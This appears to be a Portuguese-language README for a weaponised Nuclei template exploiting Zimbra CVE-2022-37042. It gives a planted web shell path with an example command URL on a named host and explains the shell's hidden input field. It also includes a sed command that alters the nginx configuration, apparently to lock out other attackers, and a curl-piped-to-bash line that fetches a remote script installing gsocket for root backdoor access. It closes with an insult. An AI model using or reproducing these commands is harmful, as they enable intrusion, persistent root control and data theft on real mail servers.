
Template armado do Zimbra CVE-2022-37042 para Nuclei
caminho da shell: /public/formatter.jsp
O próprio Nuclei: https://github.com/projectdiscovery/nuclei
A shell tem um campo de entrada oculto com opacidade 0, por isso basta passar o mouse sobre ele, digitar o comando e pressionar a tecla [Enter]:
exemplo de URL da shell:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
execute este comando (mas apenas uma vez):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
é necessário código adicional para servidores com Apache em vez de Nginx. Pull requests são bem-vindos.
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
Este comando instalará o global-socket (https://www.gsocket.io/deploy/) e fornecerá a chave para você se conectar como root.
feliz aniversário, massacre, filhos da puta ;)